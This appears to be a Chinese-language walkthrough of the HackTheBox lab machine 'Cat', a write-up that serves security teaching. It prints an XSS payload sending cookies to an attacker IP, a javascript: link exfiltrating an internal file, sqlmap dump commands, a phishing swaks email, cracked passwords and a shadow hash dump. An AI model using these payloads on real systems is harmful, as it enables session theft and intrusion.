HTB-Cat

admin
admin
admin
135588
文章
111
评论
2025年2月7日00:20:55评论163 views字数 3817阅读12分43秒阅读模式
HTB-Cat
扫描靶机
nmap -A -v -T4 10.10.11.53
HTB-Cat
就这常规的两个端口,得到http://cat.htb/域名,看看主页
HTB-Cat
左上角有个登录表单
HTB-Cat
没有账号可以注册一个,顺便跑一下目录
HTB-Cat
HTB-Cat
可以看到有个上传的接口,抓包看看
HTB-Cat
添加了GIF89a编码就可以直接通过了,判定你是image文件,刚刚跑出来git目录, 使用gitdump工具导出

https://github.com/arthaud/git-dumper.git

python3 git_dumper.py http://cat.htb/.git/ ./gitikun
HTB-Cat
HTB-Cat
盲猜这开始代码审计,看admin.php开头
HTB-Cat
开始加载配置文件,检查是否是axel用户登录,如果不是就重定向用户到 /join.php 页面,并停止执行。然后查看一下config.php
HTB-Cat
这代码指定了sql数据库的路径/databases/cat.db,然后使用pdo创建数据库连接,并设置错误模式为异常处理;如果连接失败,就输出错误信息并且停止执行,然后看contest.php
HTB-Cat
这里是请求包数据处理,检查是否是POST数据,假如符合,服务器就录入数据,下面是验证字符,防止注入问题
HTB-Cat
下面是图像处理以及图像的路径,然后验证是否为图像的功能
HTB-Cat
这里是数据库交互,使用了PDO语句(php data objec),防止sql注入问题
HTB-Cat
这段代码包含两个函数:acceptCat 和 rejectCat,分别用于处理“接受”或“拒绝”猫的操作。每个函数都会弹出确认对话框,确认用户的操作后,通过 AJAX 请求向服务器发送数据(catName和 catID),并在操作完成后刷新页面。这样可以在不重新加载页面的情况下实现猫信息的接受或拒绝,查看一下view_cat.php
HTB-Cat
HTB-Cat
代码直接输出来自用户输入的数据(如 cat_namephoto_pathusername),如果没有进行转义(escaping)处理,可能导致跨站脚本攻击(XSS),恶意脚本可能被注入到页面中。然后查看一下accept_cat.php
HTB-Cat
这段代码$cat_name 直接拼接到 sql 查询中,假如用户输入恶意sql语句,可能会导致sql注入
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
接下来测试一下xss,先抓包上传到表单
HTB-Cat
当你名字那里加入了符号,就会返回是无效字符,回到登录界面使用js的script参数注册一个用户,然后登录
<script>fetch('http://10.10.14.99/?c='+document.cookie);</script>
HTB-Cat
登录进去,然后注册一只几把猫,本地开启服务器,就会反弹一个cookie,然后直接将cookie使用到accept_cat.php
HTB-Cat
HTB-Cat
然后新建一只几把猫后,cat栏目就会出现
HTB-Cat
直接使用bp抓包Accept按钮,然后sql注入
sqlmap -r req --risk3--level5--batch--dbms
HTB-Cat
HTB-Cat
直接拿到user 的hash
sqlmap -r req --risk 3 --level 5 --batch --dbms=sqlite --dump --threads 10 -T users --dump
HTB-Cat
HTB-Cat
拿到了一个密码:soyunaprincesarosa,可以看到有另外的用户名rosa,直接登录
HTB-Cat
成功登录,并且可以看到在adm组里面,属于管理员的一部分,可以进行系统操作了,进入到apache2日志,可以查看到axel的密码
HTB-Cat
拿到密码:aNdZwgC4tI9gnVXv_e3Q,直接登录axel
HTB-Cat
成功拿到了user flag,翻一下目录可以看到有个mali,里面有个jobert用户,有权限无法进去的,但是可以看axel的邮件,简单的了解到地址还有一下信息
HTB-Cat
HTB-Cat
然后查看一下后台端口
HTB-Cat
有一个3000跟25端口,将其代理到本地
HTB-Cat
左下角可以看到git的版本,是1.22.0,在exploit可以找到这个
https://www.exploit-db.com/exploits/52077
接下来提权,首先在axel那里创建新的repo
HTB-Cat
然后添加文件
HTB-Cat
在repo的settings那里,添加js脚本
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.99:8000/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>
HTB-Cat
更新成功后,因为开了25端口,用swaks发邮件给他们
swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link" --body "http://localhost:3000/axel/ikun" --server localhost --port 25 --timeout 30s
HTB-Cat
成功得到了axel邮件里面的md文件返回,解密可以得到信息
HTB-Cat
将md文件修改成index.php,可以得到一个密码
HTB-Cat
HTB-Cat
得到了一个密码:IKw75eR0MR7CMIxhH0,直接su root
HTB-Cat
root:$6$gZWufTq2.hEhrNx3$9xZG.3MLpfYOJo8EN24H5CoT5sJ24F7vWeky5tU4QTZ1sVKwngFUxfbAqlorjEP.aliWJZA7jS3Bxnc5HvKiH1:19994:0:99999:7:::daemon:*:19926:0:99999:7:::bin:*:19926:0:99999:7:::sys:*:19926:0:99999:7:::sync:*:19926:0:99999:7:::games:*:19926:0:99999:7:::man:*:19926:0:99999:7:::lp:*:19926:0:99999:7:::mail:*:19926:0:99999:7:::news:*:19926:0:99999:7:::uucp:*:19926:0:99999:7:::proxy:*:19926:0:99999:7:::www-data:*:19926:0:99999:7:::backup:*:19926:0:99999:7:::list:*:19926:0:99999:7:::irc:*:19926:0:99999:7:::gnats:*:19926:0:99999:7:::nobody:*:19926:0:99999:7:::systemd-network:*:19926:0:99999:7:::systemd-resolve:*:19926:0:99999:7:::systemd-timesync:*:19926:0:99999:7:::messagebus:*:19926:0:99999:7:::syslog:*:19430:0:99999:7:::_apt:*:19430:0:99999:7:::tss:*:19430:0:99999:7:::uuidd:*:19430:0:99999:7:::tcpdump:*:19430:0:99999:7:::landscape:*:19430:0:99999:7:::pollinate:*:19430:0:99999:7:::fwupd-refresh:*:19430:0:99999:7:::usbmux:*:19877:0:99999:7:::systemd-coredump:!!:19926::::::axel:$6$Qin7PtKZAmITZJvt$dNoqvN0S7anYjIHW6nwrene2XI1vBCg49koRHVpnJlCYdDn75QLsL.5CStdukiXRejTMKaHSbckmlCfaf47jn1:19882:0:99999:7:::sshd:*:19926:0:99999:7:::rosa:$6$Gcl0Zhl7CRxJqHRi$CG7HwjG/OoMBS3hnrs9m6.Wgs.CxQ.xFNqI2VTN/xMZifc06kxRUh6xgS1/wIrhObeLnqcYDTQlFi2lN0eyXS/:19966:0:99999:7:::git:*:19964:0:99999:7:::smmta:*:19965:0:99999:7:::smmsp:*:19965:0:99999:7:::jobert:$6$AYGcjhL4z59iTO0E$degFih9k1URjYwU7lMH3YKIXQEL5DfU1y833UEItzgQJgmBBsv55SW.R6EAMFUKegShaWmCPAlNfGhPxvLqW6.:19965:0:99999:7:::_laurel:!:20109::::::

原文始发于微信公众号(Jiyou too beautiful):HTB-Cat

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月7日00:20:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Cathttps://cn-sec.com/archives/3704912.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息